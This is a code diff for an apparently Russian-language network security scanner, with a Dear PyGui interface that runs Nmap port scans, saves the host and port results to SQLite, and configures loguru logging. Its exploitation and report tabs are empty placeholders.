def to_dict(self) -> Dict[str, Any]:
"""Сериализация в словарь"""
return {
'ip_address': self.ip_address,
'active_coils': self.active_coils,
'active_discrete_inputs': self.active_discrete_inputs,
'active_holding_registers': self.active_holding_registers,
'active_input_registers': self.active_input_registers
}

261
src/core/services/gui.py Normal file
View File

@ -0,0 +1,261 @@
import dearpygui.dearpygui as dpg
from typing import Dict, Any, List, Callable
from src.core.api.nmap import NmapScanner
from src.core.database.database import SQLiteDB
from src.utils.logger import get_logger
import time
import os
logger = get_logger("gui")
class BaseTab:
"""Базовый класс для вкладок GUI."""
def __init__(self, parent: 'SecurityScannerGUI'):
self.parent = parent
def create_content(self):
"""Создание содержимого вкладки."""
raise NotImplementedError("Метод create_content должен быть переопределен в дочернем классе")
class ScanningTab(BaseTab):
"""Вкладка для сканирования (Nmap)."""
def create_content(self):
with dpg.tab(label="Сканирование"):
dpg.add_text("Настройки сканирования Nmap")
dpg.add_input_text(label="Целевой IP", default_value="192.168.1.0/24", tag="scan_ip")
dpg.add_input_text(label="Аргументы", default_value="-p 1-10000", tag="scan_args")
dpg.add_button(label="Запустить сканирование", callback=self.parent.start_scan)
class ResultsTab(BaseTab):
"""Вкладка для отображения результатов."""
def create_content(self):
with dpg.tab(label="Результаты"):
dpg.add_text("Результаты сканирования")
with dpg.group(horizontal=True):
dpg.add_text("Обновить результаты:")
dpg.add_button(label="Обновить", callback=self.parent.update_results)
with dpg.table(
header_row=True,
resizable=True,
policy=dpg.mvTable_SizingStretchProp,
borders_innerH=True,
borders_outerH=True,
borders_innerV=True,
borders_outerV=True,
tag="results_table"
):
dpg.add_table_column(label="IP")
dpg.add_table_column(label="Состояние")
dpg.add_table_column(label="Время сканирования")
self.parent.port_details_group = dpg.add_group(show=False)
class SettingsTab(BaseTab):
"""Вкладка для настроек."""
def create_content(self):
with dpg.tab(label="Настройки"):
dpg.add_text("Настройки приложения (в разработке)")
class ExploitationTab(BaseTab):
"""Вкладка для эксплуатации (заглушка)."""
def create_content(self):
with dpg.tab(label="Эксплуатация"):
dpg.add_text("Инструменты эксплуатации (в разработке: Metasploit, Scapy, Hping3)")
class GenerationTab(BaseTab):
"""Вкладка для генерации отчетов (заглушка)."""
def create_content(self):
with dpg.tab(label="Генерация"):
dpg.add_text("Генерация отчетов (PDF, JSON) в разработке")
class SecurityScannerGUI:
"""Главный класс GUI для управления интерфейсом."""
def __init__(self, db: SQLiteDB):
self.db = db
self.tabs = []
self.results_table = None
self.port_details_group = None
self.setup_dpg()
self.create_main_window()
def setup_dpg(self):
"""Настройка Dear PyGui с поддержкой кириллицы и адаптацией к размеру viewport'а."""
dpg.create_context()
# Создаём viewport с временными размерами
dpg.create_viewport(
title="Security Scanner",
width=800,
height=600,
x_pos=0,
y_pos=0,
resizable=True
)
# Загрузка шрифта с поддержкой кириллицы
font_path = os.path.join("/home/lodqa/attack_module_data/Exo2-VariableFont_wght.ttf")
if os.path.exists(font_path):
big_let_start = 0x00C0 # Capital "A" in cyrillic alphabet
big_let_end = 0x00DF # Capital "Я" in cyrillic alphabet
small_let_end = 0x00FF # small "я" in cyrillic alphabet
remap_big_let = 0x0410 # Starting number for remapped cyrillic alphabet
alph_len = big_let_end - big_let_start + 1 # adds the shift from big letters to small
alph_shift = remap_big_let - big_let_start # adds the shift from remapped to non-remapped
with dpg.font_registry():
with dpg.font(font_path, 18) as default_font:
dpg.add_font_range_hint(dpg.mvFontRangeHint_Default)
dpg.add_font_range_hint(dpg.mvFontRangeHint_Cyrillic)
biglet = remap_big_let
for i1 in range(big_let_start, big_let_end + 1):
dpg.add_char_remap(i1, biglet)
dpg.add_char_remap(i1 + alph_len, biglet + alph_len)
biglet += 1
dpg.bind_font(default_font)
else:
logger.warning(f"Шрифт {font_path} не найден. Используется шрифт по умолчанию.")
# Завершаем настройку Dear PyGui
dpg.setup_dearpygui()
dpg.show_viewport()
# Получаем текущие размеры viewport'а после инициализации
screen_width = dpg.get_viewport_client_width()
screen_height = dpg.get_viewport_client_height()
logger.debug(f"Размеры viewport'а: {screen_width}x{screen_height}")
# Устанавливаем размеры окна на основе доступного пространства
dpg.configure_viewport(
"Security Scanner",
width=screen_width,
height=screen_height,
x_pos=0,
y_pos=0
)
# Добавляем горячую клавишу для выхода (Ctrl+Q)
# with dpg.handler_registry():
# dpg.add_key_press_handler(dpg.mvKey_Q, modifier=dpg.mvKeyMod_Control, callback=lambda: dpg.stop_dearpygui())
def create_main_window(self):
"""Создание главного окна."""
with dpg.window(
label="Security Scanner",
width=dpg.get_viewport_client_width(),
height=dpg.get_viewport_client_height(),
pos=[0, 0],
no_title_bar=False,
no_resize=False,
no_move=False,
no_close=False
):
with dpg.tab_bar(tag="main_tab_bar"):
# Инициализация вкладок
self.tabs = [
ScanningTab(self),
ResultsTab(self),
SettingsTab(self),
ExploitationTab(self),
GenerationTab(self)
]
for tab in self.tabs:
tab.create_content()
with dpg.group():
dpg.add_text("Лог операций:")
self.log_text = dpg.add_text("", wrap=0)
def add_new_tab(self, tab_name: str, content_callback: Callable):
"""Добавление новой вкладки."""
with dpg.tab(label=tab_name, parent="main_tab_bar"):
content_callback()
def log(self, message: str, level: str = "info"):
"""Логирование сообщения в интерфейсе и в логгер."""
current_log = dpg.get_value(self.log_text)
timestamp = time.strftime("%Y-%m-%d %H:%M:%S")
new_log = f"{current_log}[{timestamp}] {message}\n"
dpg.set_value(self.log_text, new_log)
getattr(logger, level)(message)
def start_scan(self, sender, app_data, user_data):
"""Запуск сканирования Nmap."""
ip = dpg.get_value("scan_ip")
args = dpg.get_value("scan_args")
self.log(f"Запуск сканирования для IP: {ip} с аргументами: {args}")
try:
scanner = NmapScanner(ip, args)
results = scanner.start_scan()
# Добавляем временную метку
for host in results["hosts"].values():
host["scan_timestamp"] = time.strftime("%Y-%m-%d %H:%M:%S")
self.db.save_scan_results(results)
self.log(f"Сканирование завершено. Найдено хостов: {len(results['hosts'])}", "success")
self.update_results()
except Exception as e:
self.log(f"Ошибка при сканировании: {e}", "error")
def update_results(self, sender=None, app_data=None, user_data=None):
"""Обновление таблицы результатов."""
# Удаляем старую таблицу и создаем новую
if dpg.does_item_exist("results_table"):
dpg.delete_item("results_table")
with dpg.table(
header_row=True,
resizable=True,
policy=dpg.mvTable_SizingStretchProp,
borders_innerH=True,
borders_outerH=True,
borders_innerV=True,
borders_outerV=True,
tag="results_table"
):
dpg.add_table_column(label="IP")
dpg.add_table_column(label="Состояние")
dpg.add_table_column(label="Время сканирования")
hosts = self.db.get_all_hosts()
for host in hosts:
with dpg.table_row():
dpg.add_text(host["ip"])
dpg.add_text(host["state"])
dpg.add_text(host["scan_timestamp"])
dpg.add_table_cell().bind_item(
dpg.add_button(label="Детали", callback=self.show_port_details, user_data=host["id"])
)
def show_port_details(self, sender, app_data, user_data):
"""Отображение деталей портов для выбранного хоста."""
host_id = user_data
if self.port_details_group and dpg.does_item_exist(self.port_details_group):
dpg.delete_item(self.port_details_group, children_only=True)
else:
self.port_details_group = dpg.add_group(show=False)
with dpg.group(parent=self.port_details_group):
dpg.add_text(f"Порты для хоста (ID: {host_id})")
with dpg.table(
header_row=True,
resizable=True,
policy=dpg.mvTable_SizingStretchProp,
borders_innerH=True,
borders_outerH=True,
borders_innerV=True,
borders_outerV=True
):
dpg.add_table_column(label="Порт")
dpg.add_table_column(label="Протокол")
dpg.add_table_column(label="Состояние")
dpg.add_table_column(label="Сервис")
dpg.add_table_column(label="Версия")
ports = self.db.get_ports_by_host_id(host_id)
for port in ports:
with dpg.table_row():
dpg.add_text(str(port["port"]))
dpg.add_text(port["protocol"])
dpg.add_text(port["state"])
dpg.add_text(port["service"] or "N/A")
dpg.add_text(port["version"] or "N/A")
def run(self):
"""Запуск интерфейса."""
dpg.start_dearpygui()
dpg.destroy_context()

12
src/main.py Normal file
View File

@ -0,0 +1,12 @@
from src.core.services.gui import SecurityScannerGUI
from src.core.database.database import SQLiteDB
def main():
# Инициализация базы данных
db = SQLiteDB("/home/lodqa/attack_module_data/database.db")
# Инициализация интерфейса
gui = SecurityScannerGUI(db)
gui.run()
if __name__ == "__main__":
main()

84
src/utils/logger.py Normal file
View File

@ -0,0 +1,84 @@
from loguru import logger
import sys
import os
from pathlib import Path
class AppLogger:
_instance = None
def __new__(cls, *args, **kwargs):
if not cls._instance:
cls._instance = super(AppLogger, cls).__new__(cls)
cls._instance.__initialized = False
return cls._instance
def __init__(self, app_name: str = "security-scanner", log_dir: str = "/home/lodqa/attack_module_data/logs"):
if self.__initialized:
return
self.__initialized = True
self.app_name = app_name
self.log_dir = Path(log_dir)
# Создаем директорию для логов
self.log_dir.mkdir(parents=True, exist_ok=True)
# Основной файл логов
self.main_log_file = self.log_dir / f"{app_name}.log"
# Уровень логирования по умолчанию
log_level = os.getenv("LOG_LEVEL", "INFO")
# Удаляем стандартный обработчик
logger.remove()
# Конфигурация логгера
self.configure_logger(log_level)
def configure_logger(self, level: str = "INFO"):
"""Настройка логгера"""
# Формат сообщений
log_format = (
"<green>{time:YYYY-MM-DD HH:mm:ss.SSS}</green> | "
"<level>{level: <8}</level> | "
"<cyan>{name}</cyan>:<cyan>{function}</cyan>:<cyan>{line}</cyan> | "
"<level>{message}</level>"
)
# Консольный вывод (с цветами)
logger.add(
sys.stdout,
level=level,
format=log_format,
colorize=True,
backtrace=True,
diagnose=True
)
# Файловый вывод (ротация по размеру и времени)
logger.add(
str(self.main_log_file),
level=level,
format=log_format,
rotation="10 MB",
retention="30 days",
compression="zip",
backtrace=True,
diagnose=True
)
# Дополнительные настройки
logger.configure(extra={"name": "root"})
# Перехват стандартного логирования
logger.catch()
def get_logger(self, name: str = None) -> "Logger":
"""Получение логгера для модуля"""
return logger.bind(name=name or "root")
# Глобальный экземпляр логгера
app_logger = AppLogger()
get_logger = app_logger.get_logger